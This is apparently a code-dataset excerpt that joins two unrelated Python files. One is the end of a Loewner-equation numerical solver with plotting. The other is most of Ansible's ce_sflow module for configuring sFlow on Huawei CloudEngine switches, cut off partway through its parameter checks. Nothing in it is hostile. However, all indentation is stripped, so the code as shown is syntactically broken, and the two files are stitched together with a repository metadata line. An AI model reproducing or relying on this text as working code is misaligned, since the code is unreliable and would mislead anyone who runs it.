# Import the compiled Forward Loewner module
ForwardLoewner = import_module(self.forward_module_name)
# Declare empty complex arrays for the results
self.cubic_results_a = empty(self.outer_points, dtype=complex128)
self.cubic_results_b = empty(self.outer_points, dtype=complex128)
# Solve Loewner's equation with the given parameters
ForwardLoewner.cubicloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresulta=self.cubic_results_a, zresultb=self.cubic_results_b, sqrtdrivingarg=self.alpha)
if self.save_data:
# Create filenames for the data files
filename_a = CUBIC_DATA_OUTPUT + self.properties_string + "-A" + DATA_EXT
filename_b = CUBIC_DATA_OUTPUT + self.properties_string + "-B" + DATA_EXT
# Create 2D arrays from the real and imaginary values of the results
array_a = column_stack((self.cubic_results_a.real,self.cubic_results_a.imag))
array_b = column_stack((self.cubic_results_b.real,self.cubic_results_b.imag))
# Save the arrays to the filesystem
self.save_to_dat(filename_a, array_a)
self.save_to_dat(filename_b, array_b)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the data and save it to the filesystem
self.cubic_forward_plot()
class SqrtTPlusOneLoewnerRun(LoewnerRun):
def __init__(self, start_time, final_time, outer_points, inner_points, compile_modules = True, save_data = True, save_plot = True):
# Invoke the superclass initialiser
LoewnerRun.__init__(self, SQRTPLUS_IDX, start_time, final_time, outer_points, inner_points, compile_modules, save_data, save_plot)
# Create the names and lambda function for the given driving function
self.name = "sqrt(1 + t)"
self.latex_name = "$\\xi (t) = \sqrt{1 + t}$"
self.xi = lambda t: sqrt(1 + t)
def exact_cubic_forward_loewner(self):
# Declare empty complex arrays for the exact results
self.exact_cubic_sol_a = zeros(self.outer_points, dtype = complex128)
self.exact_cubic_sol_b = zeros(self.outer_points, dtype = complex128)
# Set the 'weights' of the exact solution
a0 = 1
d0 = 1
# Define functions for generating the coefficients of the polynomial to be solved
def get_coeffs_a(t):
return [-1, 0, 10*a0**2, 0, -25*a0**4, 16*(a0**2 + d0 * t)**(5./2)]
def get_coeffs_b(t):
return [-1, 0, 10*a0**2, 0, -25*a0**4, -16*(a0**2 + d0 * t)**(5./2)]
# Iterate through the exact time values
for i in range(self.outer_points):
# Find the roots of the polynomials at the given time value
exact_roots_a = roots(get_coeffs_a(self.exact_time_sol[i]))
exact_roots_b = roots(get_coeffs_b(self.exact_time_sol[i]))
# Select the fourth root (this one has the positive imaginary component)
self.exact_cubic_sol_a[i] = exact_roots_a[3]
self.exact_cubic_sol_b[i] = exact_roots_b[3]
if self.save_data:
# Create filenames for the dat file
filename_a = EXACT_CUBIC_DATA_OUTPUT + self.short_properties_string + "-A" + DATA_EXT
filename_b = EXACT_CUBIC_DATA_OUTPUT + self.short_properties_string + "-B" + DATA_EXT
# Create 2D arrays from the real and imaginary values of the results
array_a = column_stack((self.exact_cubic_sol_a.real, self.exact_cubic_sol_a.imag))
array_b = column_stack((self.exact_cubic_sol_b.real, self.exact_cubic_sol_b.imag))
# Save the arrays to the filesystem
self.save_to_dat(filename_a, array_a)
self.save_to_dat(filename_b, array_b)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the results
plt.plot(self.exact_cubic_sol_a.real, self.exact_cubic_sol_a.imag, color='crimson')
plt.plot(self.exact_cubic_sol_b.real, self.exact_cubic_sol_b.imag, color='crimson')
# Set the axes labels
plt.xlabel(FOR_PLOT_XL)
plt.ylabel(FOR_PLOT_YL)
# Set the lower limit of the y-axis
plt.ylim(bottom=0)
# Save the plot to the filesystem
plt.savefig(EXACT_CUBIC_PLOT_OUTPUT + self.short_properties_string + PLOT_EXT, bbox_inches='tight')
|
ptemplier/ansible | refs/heads/devel | lib/ansible/modules/network/cloudengine/ce_sflow.py | 26 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: ce_sflow
version_added: "2.4"
short_description: Manages sFlow configuration on HUAWEI CloudEngine switches.
description:
- Configure Sampled Flow (sFlow) to monitor traffic on an interface in real time,
detect abnormal traffic, and locate the source of attack traffic,
ensuring stable running of the network.
author: QijunPan (@CloudEngine-Ansible)
options:
agent_ip:
description:
- Specifies the IPv4/IPv6 address of an sFlow agent.
required: false
default: null
source_ip:
description:
- Specifies the source IPv4/IPv6 address of sFlow packets.
required: false
default: null
collector_id:
description:
- Specifies the ID of an sFlow collector. This ID is used when you specify
the collector in subsequent sFlow configuration.
required: false
default: null
choices: ['1', '2']
collector_ip:
description:
- Specifies the IPv4/IPv6 address of the sFlow collector.
required: false
default: null
collector_ip_vpn:
description:
- Specifies the name of a VPN instance.
The value is a string of 1 to 31 case-sensitive characters, spaces not supported.
When double quotation marks are used around the string, spaces are allowed in the string.
The value C(_public_) is reserved and cannot be used as the VPN instance name.
required: false
default: null
collector_datagram_size:
description:
- Specifies the maximum length of sFlow packets sent from an sFlow agent to an sFlow collector.
The value is an integer, in bytes. It ranges from 1024 to 8100. The default value is 1400.
required: false
default: null
collector_udp_port:
description:
- Specifies the UDP destination port number of sFlow packets.
The value is an integer that ranges from 1 to 65535. The default value is 6343.
required: false
default: null
collector_meth:
description:
- Configures the device to send sFlow packets through service interfaces,
enhancing the sFlow packet forwarding capability.
The enhanced parameter is optional. No matter whether you configure the enhanced mode,
the switch determines to send sFlow packets through service cards or management port
based on the routing information on the collector.
When the value is meth, the device forwards sFlow packets at the control plane.
When the value is enhanced, the device forwards sFlow packets at the forwarding plane to
enhance the sFlow packet forwarding capacity.
required: false
default: null
choices: ['meth', 'enhanced']
collector_description:
description:
- Specifies the description of an sFlow collector.
The value is a string of 1 to 255 case-sensitive characters without spaces.
required: false
default: null
sflow_interface:
description:
- Full name of interface for Flow Sampling or Counter.
It must be a physical interface, Eth-Trunk, or Layer 2 subinterface.
required: false
default: null
sample_collector:
description:
- Indicates the ID list of the collector.
required: false
default: null
sample_rate:
description:
- Specifies the flow sampling rate in the format 1/rate.
The value is an integer and ranges from 1 to 4294967295. The default value is 8192.
required: false
default: null
sample_length:
description:
- Specifies the maximum length of sampled packets.
The value is an integer and ranges from 18 to 512, in bytes. The default value is 128.
required: false
default: null
sample_direction:
description:
- Enables flow sampling in the inbound or outbound direction.
required: false
default: null
choices: ['inbound', 'outbound', 'both']
counter_collector:
description:
- Indicates the ID list of the counter collector.
required: false
default: null
counter_interval:
description:
- Indicates the counter sampling interval.
The value is an integer that ranges from 10 to 4294967295, in seconds. The default value is 20.
required: false
default: null
export_route:
description:
- Configures the sFlow packets sent by the switch not to carry routing information.
required: false
default: null
choices: ['enable', 'disable']
rate_limit:
description:
- Specifies the rate of sFlow packets sent from a card to the control plane.
The value is an integer that ranges from 100 to 1500, in pps.
required: false
default: null
rate_limit_slot:
description:
- Specifies the slot where the rate of output sFlow packets is limited.
If this parameter is not specified, the rate of sFlow packets sent from
all cards to the control plane is limited.
The value is an integer or a string of characters.
required: false
default: null
forward_enp_slot:
description:
- Enable the Embedded Network Processor (ENP) chip function.
The switch uses the ENP chip to perform sFlow sampling,
and the maximum sFlow sampling interval is 65535.
If you set the sampling interval to be larger than 65535,
the switch automatically restores it to 65535.
The value is an integer or 'all'.
required: false
default: null
state:
description:
- Determines whether the config should be present or not
on the device.
required: false
default: present
choices: ['present', 'absent']
"""
EXAMPLES = '''
---
- name: sflow module test
hosts: ce128
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: Configuring sFlow Agent
ce_sflow:
agent_ip: 6.6.6.6
provider: '{{ cli }}'
- name: Configuring sFlow Collector
ce_sflow:
collector_id: 1
collector_ip: 7.7.7.7
collector_ip_vpn: vpn1
collector_description: Collector1
provider: '{{ cli }}'
- name: Configure flow sampling.
ce_sflow:
sflow_interface: 10GE2/0/2
sample_collector: 1
sample_direction: inbound
provider: '{{ cli }}'
- name: Configure counter sampling.
ce_sflow:
sflow_interface: 10GE2/0/2
counter_collector: 1
counter_interval: 1000
provider: '{{ cli }}'
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: verbose mode
type: dict
sample: {"agent_ip": "6.6.6.6", "state": "present"}
existing:
description: k/v pairs of existing configuration
returned: verbose mode
type: dict
sample: {"agent": {}}
end_state:
description: k/v pairs of configuration after module execution
returned: verbose mode
type: dict
sample: {"agent": {"family": "ipv4", "ipv4Addr": "1.2.3.4", "ipv6Addr": null}}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["sflow agent ip 6.6.6.6"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
import re
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_nc_config, set_nc_config, ce_argument_spec, check_ip_addr
from ansible.module_utils.ce import get_config, load_config
CE_NC_GET_SFLOW = """
<filter type="subtree">
<sflow xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<sources>
<source>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
</source>
</sources>
<agents>
<agent>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
</agent>
</agents>
<collectors>
<collector>
<collectorID></collectorID>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
<vrfName></vrfName>
<datagramSize></datagramSize>
<port></port>
<description></description>
<meth></meth>
</collector>
</collectors>
<samplings>
<sampling>
<ifName>%s</ifName>
<collectorID></collectorID>
<direction></direction>
<length></length>
<rate></rate>
</sampling>
</samplings>
<counters>
<counter>
<ifName>%s</ifName>
<collectorID></collectorID>
<interval></interval>
</counter>
</counters>
<exports>
<export>
<ExportRoute></ExportRoute>
</export>
</exports>
</sflow>
</filter>
"""
def is_config_exist(cmp_cfg, test_cfg):
"""is configuration exist?"""
if not cmp_cfg or not test_cfg:
return False
return bool(test_cfg in cmp_cfg)
def is_valid_ip_vpn(vpname):
"""check ip vpn"""
if not vpname:
return False
if vpname == "_public_":
return False
if len(vpname) < 1 or len(vpname) > 31:
return False
return True
def get_ip_version(address):
"""get ip version fast"""
if not address:
return None
if address.count(':') >= 2 and address.count(":") <= 7:
return "ipv6"
elif address.count('.') == 3:
return "ipv4"
else:
return None
def get_interface_type(interface):
"""get the type of interface, such as 10GE, ETH-TRUNK, VLANIF..."""
if interface is None:
return None
if interface.upper().startswith('GE'):
iftype = 'ge'
elif interface.upper().startswith('10GE'):
iftype = '10ge'
elif interface.upper().startswith('25GE'):
iftype = '25ge'
elif interface.upper().startswith('4X10GE'):
iftype = '4x10ge'
elif interface.upper().startswith('40GE'):
iftype = '40ge'
elif interface.upper().startswith('100GE'):
iftype = '100ge'
elif interface.upper().startswith('VLANIF'):
iftype = 'vlanif'
elif interface.upper().startswith('LOOPBACK'):
iftype = 'loopback'
elif interface.upper().startswith('METH'):
iftype = 'meth'
elif interface.upper().startswith('ETH-TRUNK'):
iftype = 'eth-trunk'
elif interface.upper().startswith('VBDIF'):
iftype = 'vbdif'
elif interface.upper().startswith('NVE'):
iftype = 'nve'
elif interface.upper().startswith('TUNNEL'):
iftype = 'tunnel'
elif interface.upper().startswith('ETHERNET'):
iftype = 'ethernet'
elif interface.upper().startswith('FCOE-PORT'):
iftype = 'fcoe-port'
elif interface.upper().startswith('FABRIC-PORT'):
iftype = 'fabric-port'
elif interface.upper().startswith('STACK-PORT'):
iftype = 'stack-port'
elif interface.upper().startswith('NULL'):
iftype = 'null'
else:
return None
return iftype.lower()
def get_rate_limit(config):
"""get sflow management-plane export rate-limit info"""
get = re.findall(r"sflow management-plane export rate-limit ([0-9]+) slot ([0-9]+)", config)
if not get:
get = re.findall(r"sflow management-plane export rate-limit ([0-9]+)", config)
if not get:
return None
else:
return dict(rate_limit=get[0])
else:
limit = list()
for slot in get:
limit.append(dict(rate_limit=slot[0], slot_id=slot[1]))
return limit
def get_forward_enp(config):
"""get assign forward enp sflow enable slot info"""
get = re.findall(r"assign forward enp sflow enable slot (\S+)", config)
if not get:
return None
else:
return list(get)
class Sflow(object):
"""Manages sFlow"""
def __init__(self, argument_spec):
self.spec = argument_spec
self.module = None
self.__init_module__()
# module input info
self.agent_ip = self.module.params['agent_ip']
self.agent_version = None
self.source_ip = self.module.params['source_ip']
self.source_version = None
self.export_route = self.module.params['export_route']
self.rate_limit = self.module.params['rate_limit']
self.rate_limit_slot = self.module.params['rate_limit_slot']
self.forward_enp_slot = self.module.params['forward_enp_slot']
self.collector_id = self.module.params['collector_id']
self.collector_ip = self.module.params['collector_ip']
self.collector_version = None
self.collector_ip_vpn = self.module.params['collector_ip_vpn']
self.collector_datagram_size = self.module.params['collector_datagram_size']
self.collector_udp_port = self.module.params['collector_udp_port']
self.collector_meth = self.module.params['collector_meth']
self.collector_description = self.module.params['collector_description']
self.sflow_interface = self.module.params['sflow_interface']
self.sample_collector = self.module.params['sample_collector'] or list()
self.sample_rate = self.module.params['sample_rate']
self.sample_length = self.module.params['sample_length']
self.sample_direction = self.module.params['sample_direction']
self.counter_collector = self.module.params['counter_collector'] or list()
self.counter_interval = self.module.params['counter_interval']
self.state = self.module.params['state']
# state
self.config = "" # current config
self.sflow_dict = dict()
self.changed = False
self.updates_cmd = list()
self.commands = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def __init_module__(self):
"""init module"""
required_together = [("collector_id", "collector_ip")]
self.module = AnsibleModule(
argument_spec=self.spec, required_together=required_together, supports_check_mode=True)
def check_response(self, con_obj, xml_name):
"""Check if response message is already succeed"""
xml_str = con_obj.xml
if "<ok/>" not in xml_str:
self.module.fail_json(msg='Error: %s failed.' % xml_name)
def netconf_set_config(self, xml_str, xml_name):
"""netconf set config"""
rcv_xml = set_nc_config(self.module, xml_str)
if "<ok/>" not in rcv_xml:
self.module.fail_json(msg='Error: %s failed.' % xml_name)
def cli_load_config(self, commands):
"""load config by cli"""
if not self.module.check_mode:
load_config(self.module, commands)
def get_current_config(self):
"""get current configuration"""
flags = list()
exp = ""
if self.rate_limit:
exp += "assign sflow management-plane export rate-limit %s" % self.rate_limit
if self.rate_limit_slot:
exp += " slot %s" % self.rate_limit_slot
exp += "$"
if self.forward_enp_slot:
if exp:
exp += "|"
exp += "assign forward enp sflow enable slot %s$" % self.forward_enp_slot
if exp:
exp = " | ignore-case include " + exp
flags.append(exp)
return get_config(self.module, flags)
else:
return ""
def cli_add_command(self, command, undo=False):
"""add command to self.update_cmd and self.commands"""
if undo and command.lower() not in ["quit", "return"]:
cmd = "undo " + command
else:
cmd = command
self.commands.append(cmd) # set to device
if command.lower() not in ["quit", "return"]:
self.updates_cmd.append(cmd) # show updates result
def get_sflow_dict(self):
""" sflow config dict"""
sflow_dict = dict(source=list(), agent=dict(), collector=list(),
sampling=dict(), counter=dict(), export=dict())
conf_str = CE_NC_GET_SFLOW % (
self.sflow_interface, self.sflow_interface)
if not self.collector_meth:
conf_str = conf_str.replace("<meth></meth>", "")
rcv_xml = get_nc_config(self.module, conf_str)
if "<data/>" in rcv_xml:
return sflow_dict
xml_str = rcv_xml.replace('\r', '').replace('\n', '').\
replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
root = ElementTree.fromstring(xml_str)
# get source info
srcs = root.findall("data/sflow/sources/source")
if srcs:
for src in srcs:
attrs = dict()
for attr in src:
if attr.tag in ["family", "ipv4Addr", "ipv6Addr"]:
attrs[attr.tag] = attr.text
sflow_dict["source"].append(attrs)
# get agent info
agent = root.find("data/sflow/agents/agent")
if agent:
for attr in agent:
if attr.tag in ["family", "ipv4Addr", "ipv6Addr"]:
sflow_dict["agent"][attr.tag] = attr.text
# get collector info
collectors = root.findall("data/sflow/collectors/collector")
if collectors:
for collector in collectors:
attrs = dict()
for attr in collector:
if attr.tag in ["collectorID", "family", "ipv4Addr", "ipv6Addr",
"vrfName", "datagramSize", "port", "description", "meth"]:
attrs[attr.tag] = attr.text
sflow_dict["collector"].append(attrs)
# get sampling info
sample = root.find("data/sflow/samplings/sampling")
if sample:
for attr in sample:
if attr.tag in ["ifName", "collectorID", "direction", "length", "rate"]:
sflow_dict["sampling"][attr.tag] = attr.text
# get counter info
counter = root.find("data/sflow/counters/counter")
if counter:
for attr in counter:
if attr.tag in ["ifName", "collectorID", "interval"]:
sflow_dict["counter"][attr.tag] = attr.text
# get export info
export = root.find("data/sflow/exports/export")
if export:
for attr in export:
if attr.tag == "ExportRoute":
sflow_dict["export"][attr.tag] = attr.text
return sflow_dict
def config_agent(self):
"""configures sFlow agent"""
xml_str = ''
if not self.agent_ip:
return xml_str
self.agent_version = get_ip_version(self.agent_ip)
if not self.agent_version:
self.module.fail_json(msg="Error: agent_ip is invalid.")
if self.state == "present":
if self.agent_ip != self.sflow_dict["agent"].get("ipv4Addr") \
and self.agent_ip != self.sflow_dict["agent"].get("ipv6Addr"):
xml_str += '<agents><agent operation="merge">'
xml_str += '<family>%s</family>' % self.agent_version
if self.agent_version == "ipv4":
xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.agent_ip
self.updates_cmd.append("sflow agent ip %s" % self.agent_ip)
else:
xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.agent_ip
self.updates_cmd.append("sflow agent ipv6 %s" % self.agent_ip)
xml_str += '</agent></agents>'
else:
if self.agent_ip == self.sflow_dict["agent"].get("ipv4Addr") \
or self.agent_ip == self.sflow_dict["agent"].get("ipv6Addr"):
xml_str += '<agents><agent operation="delete"></agent></agents>'
self.updates_cmd.append("undo sflow agent")
return xml_str
def config_source(self):
"""configures the source IP address for sFlow packets"""
xml_str = ''
if not self.source_ip:
return xml_str
self.source_version = get_ip_version(self.source_ip)
if not self.source_version:
self.module.fail_json(msg="Error: source_ip is invalid.")
src_dict = dict()
for src in self.sflow_dict["source"]:
if src.get("family") == self.source_version:
src_dict = src
break
if self.state == "present":
if self.source_ip != src_dict.get("ipv4Addr") \
and self.source_ip != src_dict.get("ipv6Addr"):
xml_str += '<sources><source operation="merge">'
xml_str += '<family>%s</family>' % self.source_version
if self.source_version == "ipv4":
xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.source_ip
self.updates_cmd.append("sflow source ip %s" % self.source_ip)
else:
xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.source_ip
self.updates_cmd.append(
"sflow source ipv6 %s" % self.source_ip)
xml_str += '</source ></sources>'
else:
if self.source_ip == src_dict.get("ipv4Addr"):
xml_str += '<sources><source operation="delete"><family>ipv4</family></source ></sources>'
self.updates_cmd.append("undo sflow source ip %s" % self.source_ip)
elif self.source_ip == src_dict.get("ipv6Addr"):
xml_str += '<sources><source operation="delete"><family>ipv6</family></source ></sources>'
self.updates_cmd.append("undo sflow source ipv6 %s" % self.source_ip)
return xml_str
def config_collector(self):
"""creates an sFlow collector and sets or modifies optional parameters for the sFlow collector"""
xml_str = ''
if not self.collector_id:
return xml_str
if self.state == "present" and not self.collector_ip:
return xml_str
if self.collector_ip:
self.collector_version = get_ip_version(self.collector_ip)
if not self.collector_version:
self.module.fail_json(msg="Error: collector_ip is invalid.")
# get collector dict
exist_dict = dict()
for collector in self.sflow_dict["collector"]:
if collector.get("collectorID") == self.collector_id:
exist_dict = collector
break
change = False
if self.state == "present":
if not exist_dict:
change = True
elif self.collector_version != exist_dict.get("family"):
change = True
elif self.collector_version == "ipv4" and self.collector_ip != exist_dict.get("ipv4Addr"):
change = True
elif self.collector_version == "ipv6" and self.collector_ip != exist_dict.get("ipv6Addr"):
change = True
elif self.collector_ip_vpn and self.collector_ip_vpn != exist_dict.get("vrfName"):
change = True
elif not self.collector_ip_vpn and exist_dict.get("vrfName") != "_public_":
change = True
elif self.collector_udp_port and self.collector_udp_port != exist_dict.get("port"):
change = True
elif not self.collector_udp_port and exist_dict.get("port") != "6343":
change = True
elif self.collector_datagram_size and self.collector_datagram_size != exist_dict.get("datagramSize"):
change = True
elif not self.collector_datagram_size and exist_dict.get("datagramSize") != "1400":
change = True
elif self.collector_meth and self.collector_meth != exist_dict.get("meth"):
change = True
elif not self.collector_meth and exist_dict.get("meth") and exist_dict.get("meth") != "meth":
change = True
elif self.collector_description and self.collector_description != exist_dict.get("description"):
change = True
elif not self.collector_description and exist_dict.get("description"):
change = True
else:
pass
else: # absent
# collector not exist
if not exist_dict:
return xml_str
if self.collector_version and self.collector_version != exist_dict.get("family"):
return xml_str
if self.collector_version == "ipv4" and self.collector_ip != exist_dict.get("ipv4Addr"):
return xml_str
if self.collector_version == "ipv6" and self.collector_ip != exist_dict.get("ipv6Addr"):
return xml_str
if self.collector_ip_vpn and self.collector_ip_vpn != exist_dict.get("vrfName"):
return xml_str
if self.collector_udp_port and self.collector_udp_port != exist_dict.get("port"):
return xml_str
if self.collector_datagram_size and self.collector_datagram_size != exist_dict.get("datagramSize"):
return xml_str
if self.collector_meth and self.collector_meth != exist_dict.get("meth"):
return xml_str
if self.collector_description and self.collector_description != exist_dict.get("description"):
return xml_str
change = True
if not change:
return xml_str
# update or delete
if self.state == "absent":
xml_str += '<collectors><collector operation="delete"><collectorID>%s</collectorID>' % self.collector_id
self.updates_cmd.append("undo collector %s" % self.collector_id)
else:
xml_str += '<collectors><collector operation="merge"><collectorID>%s</collectorID>' % self.collector_id
cmd = "sflow collector %s" % self.collector_id
xml_str += '<family>%s</family>' % self.collector_version
if self.collector_version == "ipv4":
cmd += " ip %s" % self.collector_ip
xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.collector_ip
else:
cmd += " ipv6 %s" % self.collector_ip
xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.collector_ip
if self.collector_ip_vpn:
cmd += " vpn-instance %s" % self.collector_ip_vpn
xml_str += '<vrfName>%s</vrfName>' % self.collector_ip_vpn
if self.collector_datagram_size:
cmd += " length %s" % self.collector_datagram_size
xml_str += '<datagramSize>%s</datagramSize>' % self.collector_datagram_size
if self.collector_udp_port:
cmd += " udp-port %s" % self.collector_udp_port
xml_str += '<port>%s</port>' % self.collector_udp_port
if self.collector_description:
cmd += " description %s" % self.collector_description
xml_str += '<description>%s</description>' % self.collector_description
else:
xml_str += '<description></description>'
if self.collector_meth:
if self.collector_meth == "enhanced":
cmd += " enhanced"
xml_str += '<meth>%s</meth>' % self.collector_meth
self.updates_cmd.append(cmd)
xml_str += "</collector></collectors>"
return xml_str
def config_sampling(self):
"""configure sflow sampling on an interface"""
xml_str = ''
if not self.sflow_interface:
return xml_str
if not self.sflow_dict["sampling"] and self.state == "absent":
return xml_str
self.updates_cmd.append("interface %s" % self.sflow_interface)
if self.state == "present":
xml_str += '<samplings><sampling operation="merge"><ifName>%s</ifName>' % self.sflow_interface
else:
xml_str += '<samplings><sampling operation="delete"><ifName>%s</ifName>' % self.sflow_interface
# sample_collector
if self.sample_collector:
if self.sflow_dict["sampling"].get("collectorID") \
and self.sflow_dict["sampling"].get("collectorID") != "invalid":
existing = self.sflow_dict["sampling"].get("collectorID").split(',')
else:
existing = list()
if self.state == "present":
diff = list(set(self.sample_collector) - set(existing))
if diff:
self.updates_cmd.append(
"sflow sampling collector %s" % ' '.join(diff))
new_set = list(self.sample_collector + existing)
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(new_set)))
else:
same = list(set(self.sample_collector) & set(existing))
if same:
self.updates_cmd.append(
"undo sflow sampling collector %s" % ' '.join(same))
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(same)))
# sample_rate
if self.sample_rate:
exist = bool(self.sample_rate == self.sflow_dict["sampling"].get("rate"))
if self.state == "present" and not exist:
self.updates_cmd.append(
"sflow sampling rate %s" % self.sample_rate)
xml_str += '<rate>%s</rate>' % self.sample_rate
elif self.state == "absent" and exist:
self.updates_cmd.append(
"undo sflow sampling rate %s" % self.sample_rate)
xml_str += '<rate>%s</rate>' % self.sample_rate
# sample_length
if self.sample_length:
exist = bool(self.sample_length == self.sflow_dict["sampling"].get("length"))
if self.state == "present" and not exist:
self.updates_cmd.append(
"sflow sampling length %s" % self.sample_length)
xml_str += '<length>%s</length>' % self.sample_length
elif self.state == "absent" and exist:
self.updates_cmd.append(
"undo sflow sampling length %s" % self.sample_length)
xml_str += '<length>%s</length>' % self.sample_length
# sample_direction
if self.sample_direction:
direction = list()
if self.sample_direction == "both":
direction = ["inbound", "outbound"]
else:
direction.append(self.sample_direction)
existing = list()
if self.sflow_dict["sampling"].get("direction"):
if self.sflow_dict["sampling"].get("direction") == "both":
existing = ["inbound", "outbound"]
else:
existing.append(
self.sflow_dict["sampling"].get("direction"))
if self.state == "present":
diff = list(set(direction) - set(existing))
if diff:
new_set = list(set(direction + existing))
self.updates_cmd.append(
"sflow sampling %s" % ' '.join(diff))
if len(new_set) > 1:
new_dir = "both"
else:
new_dir = new_set[0]
xml_str += '<direction>%s</direction>' % new_dir
else:
same = list(set(existing) & set(direction))
if same:
self.updates_cmd.append("undo sflow sampling %s" % ' '.join(same))
if len(same) > 1:
del_dir = "both"
else:
del_dir = same[0]
xml_str += '<direction>%s</direction>' % del_dir
if xml_str.endswith("</ifName>"):
self.updates_cmd.pop()
return ""
xml_str += '</sampling></samplings>'
return xml_str
def config_counter(self):
"""configures sflow counter on an interface"""
xml_str = ''
if not self.sflow_interface:
return xml_str
if not self.sflow_dict["counter"] and self.state == "absent":
return xml_str
self.updates_cmd.append("interface %s" % self.sflow_interface)
if self.state == "present":
xml_str += '<counters><counter operation="merge"><ifName>%s</ifName>' % self.sflow_interface
else:
xml_str += '<counters><counter operation="delete"><ifName>%s</ifName>' % self.sflow_interface
# counter_collector
if self.counter_collector:
if self.sflow_dict["counter"].get("collectorID") \
and self.sflow_dict["counter"].get("collectorID") != "invalid":
existing = self.sflow_dict["counter"].get("collectorID").split(',')
else:
existing = list()
if self.state == "present":
diff = list(set(self.counter_collector) - set(existing))
if diff:
self.updates_cmd.append("sflow counter collector %s" % ' '.join(diff))
new_set = list(self.counter_collector + existing)
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(new_set)))
else:
same = list(set(self.counter_collector) & set(existing))
if same:
self.updates_cmd.append(
"undo sflow counter collector %s" % ' '.join(same))
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(same)))
# counter_interval
if self.counter_interval:
exist = bool(self.counter_interval == self.sflow_dict["counter"].get("interval"))
if self.state == "present" and not exist:
self.updates_cmd.append(
"sflow counter interval %s" % self.counter_interval)
xml_str += '<interval>%s</interval>' % self.counter_interval
elif self.state == "absent" and exist:
self.updates_cmd.append(
"undo sflow counter interval %s" % self.counter_interval)
xml_str += '<interval>%s</interval>' % self.counter_interval
if xml_str.endswith("</ifName>"):
self.updates_cmd.pop()
return ""
xml_str += '</counter></counters>'
return xml_str
def config_export(self):
"""configure sflow export"""
xml_str = ''
if not self.export_route:
return xml_str
if self.export_route == "enable":
if self.sflow_dict["export"] and self.sflow_dict["export"].get("ExportRoute") == "disable":
xml_str = '<exports><export operation="delete"><ExportRoute>disable</ExportRoute></export></exports>'
self.updates_cmd.append("undo sflow export extended-route-data disable")
else: # disable
if not self.sflow_dict["export"] or self.sflow_dict["export"].get("ExportRoute") != "disable":
xml_str = '<exports><export operation="create"><ExportRoute>disable</ExportRoute></export></exports>'
self.updates_cmd.append("sflow export extended-route-data disable")
return xml_str
def config_assign(self):
"""configure assign"""
# assign sflow management-plane export rate-limit rate-limit [ slot slot-id ]
if self.rate_limit:
cmd = "assign sflow management-plane export rate-limit %s" % self.rate_limit
if self.rate_limit_slot:
cmd += " slot %s" % self.rate_limit_slot
exist = is_config_exist(self.config, cmd)
if self.state == "present" and not exist:
self.cli_add_command(cmd)
elif self.state == "absent" and exist:
self.cli_add_command(cmd, undo=True)
# assign forward enp sflow enable slot { slot-id | all }
if self.forward_enp_slot:
cmd = "assign forward enp sflow enable slot %s" % self.forward_enp_slot
exist = is_config_exist(self.config, cmd)
if self.state == "present" and not exist:
self.cli_add_command(cmd)
elif self.state == "absent" and exist:
self.cli_add_command(cmd, undo=True)
def netconf_load_config(self, xml_str):
"""load sflow config by netconf"""
if not xml_str:
return
xml_cfg = """
<config>
<sflow xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
%s
</sflow>
</config>""" % xml_str
self.netconf_set_config(xml_cfg, "SET_SFLOW")
self.changed = True
def check_params(self):
"""Check all input params"""
# check agent_ip
if self.agent_ip:
self.agent_ip = self.agent_ip.upper()
if not check_ip_addr(self.agent_ip):
self.module.fail_json(msg="Error: agent_ip is invalid.")
# check source_ip
if self.source_ip:
self.source_ip = self.source_ip.upper()
if not check_ip_addr(self.source_ip):
self.module.fail_json(msg="Error: source_ip is invalid.")
# check collector
if self.collector_id:
# check collector_ip and collector_ip_vpn
if self.collector_ip:
self.collector_ip = self.collector_ip.upper()
if not check_ip_addr(self.collector_ip):
self.module.fail_json(
msg="Error: collector_ip is invalid.")
if self.collector_ip_vpn and not is_valid_ip_vpn(self.collector_ip_vpn):
self.module.fail_json(
msg="Error: collector_ip_vpn is invalid.")
# check collector_datagram_size ranges from 1024 to 8100
if self.collector_datagram_size:
if not self.collector_datagram_size.isdigit():
self.module.fail_json(
msg="Error: collector_datagram_size is not digit.")
